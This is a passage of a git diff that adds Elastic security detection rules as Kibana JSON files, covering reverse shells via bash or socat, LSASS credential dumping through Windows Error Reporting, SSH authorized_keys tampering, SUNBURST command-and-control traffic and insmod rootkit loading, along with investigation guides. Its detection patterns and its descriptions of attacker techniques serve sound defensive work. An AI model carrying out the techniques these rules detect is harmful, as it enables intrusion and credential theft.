b/packages/security_detection_engine/kibana/security_rule/2138bb70-5a5e-42fd-be5e-b38edf6a6777_2.json new file mode 100644 index 00000000000..46f90888b5d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2138bb70-5a5e-42fd-be5e-b38edf6a6777_2.json @@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule identifies suspicious network traffic patterns associated with TCP reverse shell activity. This activity consists of a network event that is followed by the creation of a shell process with suspicious command line arguments. An attacker may establish a Linux TCP reverse shell to gain remote access to a target system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Reverse Shell via Child", + "query": "sequence by host.id, process.entity_id with maxspan=5s\n [network where event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"socat\") and destination.ip != null and \n not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")]\n [process where event.type == \"start\" and event.action == \"exec\" and \n process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.args : (\"-i\", \"-l\")) or (process.parent.name == \"socat\" and process.parent.args : \"*exec*\")\n )]\n", + "references": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2138bb70-5a5e-42fd-be5e-b38edf6a6777", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "2138bb70-5a5e-42fd-be5e-b38edf6a6777_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_6.json b/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_6.json new file mode 100644 index 00000000000..23458d35af5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_6.json @@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the enable of the full user-mode dumps feature system-wide. This feature allows Windows Error Reporting (WER) to collect data after an application crashes. This setting is a requirement for the LSASS Shtinkering attack, which fakes the communication of a crash on LSASS, generating a dump of the process memory, which gives the attacker access to the credentials present on the system without having to bring malware to the system. This setting is not enabled by default, and applications must create their registry subkeys to hold settings that enable them to collect dumps.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Full User-Mode Dumps Enabled System-Wide", + "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType\"\n ) and\n registry.data.strings : (\"2\", \"0x00000002\") and\n not (process.executable : \"?:\\\\Windows\\\\system32\\\\svchost.exe\" and user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\"))\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps", + "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "220be143-5c67-4fdb-b6ce-dd6826d024fd", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "220be143-5c67-4fdb-b6ce-dd6826d024fd_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_7.json b/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_7.json new file mode 100644 index 00000000000..dc94b363589 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_7.json @@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the enable of the full user-mode dumps feature system-wide. This feature allows Windows Error Reporting (WER) to collect data after an application crashes. This setting is a requirement for the LSASS Shtinkering attack, which fakes the communication of a crash on LSASS, generating a dump of the process memory, which gives the attacker access to the credentials present on the system without having to bring malware to the system. This setting is not enabled by default, and applications must create their registry subkeys to hold settings that enable them to collect dumps.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Full User-Mode Dumps Enabled System-Wide", + "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType\"\n ) and\n registry.data.strings : (\"2\", \"0x00000002\") and\n not (process.executable : \"?:\\\\Windows\\\\system32\\\\svchost.exe\" and user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\"))\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps", + "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "220be143-5c67-4fdb-b6ce-dd6826d024fd", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "220be143-5c67-4fdb-b6ce-dd6826d024fd_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_205.json b/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_205.json new file mode 100644 index 00000000000..def435eae7d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_205.json @@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "The Secure Shell (SSH) authorized_keys file specifies which users are allowed to log into a server using public key authentication. Adversaries may modify it to maintain persistence on a victim host by adding their own public key(s).", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "SSH Authorized Keys File Modification", + "new_terms_fields": [ + "host.id", + "process.executable" + ], + "query": "event.category:file and event.type:(change or creation) and\n file.name:(\"authorized_keys\" or \"authorized_keys2\" or \"/etc/ssh/sshd_config\" or \"/root/.ssh\") and\n not process.executable:\n (/Library/Developer/CommandLineTools/usr/bin/git or\n /usr/local/Cellar/maven/*/libexec/bin/mvn or\n /Library/Java/JavaVirtualMachines/jdk*.jdk/Contents/Home/bin/java or\n /usr/bin/vim or\n /usr/local/Cellar/coreutils/*/bin/gcat or\n /usr/bin/bsdtar or\n /usr/bin/nautilus or\n /usr/bin/scp or\n /usr/bin/touch or\n /var/lib/docker/* or\n /usr/bin/google_guest_agent or \n /opt/jc/bin/jumpcloud-agent or \n /opt/puppetlabs/puppet/bin/puppet or\n /usr/bin/chef-client\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.004", + "name": "SSH Authorized Keys", + "reference": "https://attack.mitre.org/techniques/T1098/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1563", + "name": "Remote Service Session Hijacking", + "reference": "https://attack.mitre.org/techniques/T1563/", + "subtechnique": [ + { + "id": "T1563.001", + "name": "SSH Hijacking", + "reference": "https://attack.mitre.org/techniques/T1563/001/" + } + ] + }, + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.004", + "name": "SSH", + "reference": "https://attack.mitre.org/techniques/T1021/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 205 + }, + "id": "2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_205", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_108.json b/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_108.json new file mode 100644 index 00000000000..53e9640e6dd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_108.json @@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "The malware known as SUNBURST targets the SolarWind's Orion business software for command and control. This rule detects post-exploitation command and control activity of the SUNBURST backdoor.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.network-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "SUNBURST Command and Control Activity", + "note": "## Triage and analysis\n\n### Investigating SUNBURST Command and Control Activity\n\nSUNBURST is a trojanized version of a digitally signed SolarWinds Orion plugin called SolarWinds.Orion.Core.BusinessLayer.dll. The plugin contains a backdoor that communicates via HTTP to third-party servers. After an initial dormant period of up to two weeks, SUNBURST may retrieve and execute commands that instruct the backdoor to transfer files, execute files, profile the system, reboot the system, and disable system services. The malware's network traffic attempts to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol, and the malware stores persistent state data within legitimate plugin configuration files. The backdoor uses multiple obfuscated blocklists to identify processes, services, and drivers associated with forensic and anti-virus tools.\n\nMore details on SUNBURST can be found on the [Mandiant Report](https://www.mandiant.com/resources/sunburst-additional-technical-details).\n\nThis rule identifies suspicious network connections that attempt to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the environment at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Upgrade SolarWinds systems to the latest version to eradicate the chance of reinfection by abusing the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "network where host.os.type == \"windows\" and event.type == \"protocol\" and network.protocol == \"http\" and\n process.name : (\"ConfigurationWizard.exe\",\n \"NetFlowService.exe\",\n \"NetflowDatabaseMaintenance.exe\",\n \"SolarWinds.Administration.exe\",\n \"SolarWinds.BusinessLayerHost.exe\",\n \"SolarWinds.BusinessLayerHostx64.exe\",\n \"SolarWinds.Collector.Service.exe\",\n \"SolarwindsDiagnostics.exe\") and\n (\n (\n (http.request.body.content : \"*/swip/Upload.ashx*\" and http.request.body.content : (\"POST*\", \"PUT*\")) or\n (http.request.body.content : (\"*/swip/SystemDescription*\", \"*/swip/Events*\") and http.request.body.content : (\"GET*\", \"HEAD*\"))\n ) and\n not http.request.body.content : \"*solarwinds.com*\"\n )\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "http.request.body.content", + "type": "wildcard" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "22599847-5d13-48cb-8872-5796fee8692b", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.001", + "name": "Web Protocols", + "reference": "https://attack.mitre.org/techniques/T1071/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1195", + "name": "Supply Chain Compromise", + "reference": "https://attack.mitre.org/techniques/T1195/", + "subtechnique": [ + { + "id": "T1195.002", + "name": "Compromise Software Supply Chain", + "reference": "https://attack.mitre.org/techniques/T1195/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "22599847-5d13-48cb-8872-5796fee8692b_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_109.json b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_109.json new file mode 100644 index 00000000000..43c34146e5b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_109.json @@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of the insmod binary to load a Linux kernel object file. Threat actors can use this binary, given they have root privileges, to load a rootkit on a system providing them with complete control and the ability to hide from security products. Manually loading a kernel module in this manner should not be at all common and can indicate suspcious or malicious behavior.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel Module Load via insmod", + "note": "## Triage and analysis\n\n### Investigating Kernel module load via insmod\n\nThe insmod binary is a Linux utility that allows users with root privileges to load kernel modules, which are object files that extend the functionality of the kernel. \n\nThreat actors can abuse this utility to load rootkits, granting them full control over the system and the ability to evade security products.\n\nThe detection rule 'Kernel module load via insmod' is designed to identify instances where the insmod binary is used to load a kernel object file (with a .ko extension) on a Linux system. This activity is uncommon and may indicate suspicious or malicious behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n### Possible investigation steps\n\n- Investigate the kernel object file that was loaded via insmod.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n- Investigate the kernel ring buffer for any warnings or messages, such as tainted or out-of-tree kernel module loads through `dmesg`.\n- Investigate syslog for any unusual segfaults or other messages. Rootkits may be installed on targets with different architecture as expected, and could potentially cause segmentation faults. \n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - $osquery_6\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses cron jobs for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Kernel Driver Load - 3e12a439-d002-4944-bc42-171c0dcb9b96\n- Tainted Out-Of-Tree Kernel Module Load - 51a09737-80f7-4551-a3be-dac8ef5d181a\n- Tainted Kernel Module Load - 05cad2fb-200c-407f-b472-02ea8c9e5e4a\n- Attempt to Clear Kernel Ring Buffer - 2724808c-ba5d-48b2-86d2-0002103df753\n- Enumeration of Kernel Modules via Proc - 80084fa9-8677-4453-8680-b891d3c0c778\n- Suspicious Modprobe File Event - 40ddbcc8-6561-44d9-afc8-eefdbfe0cccd\n- Kernel Module Removal - cd66a5af-e34b-4bb0-8931-57d0a043f2ef\n- Enumeration of Kernel Modules - 2d8043ed-5bda-4caf-801c-c1feb7410504\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and process.name == \"insmod\" and process.args : \"*.ko\"\n", + "references": [ + "https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2339f03c-f53f-40fa-834b-40c5983fc41f", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the 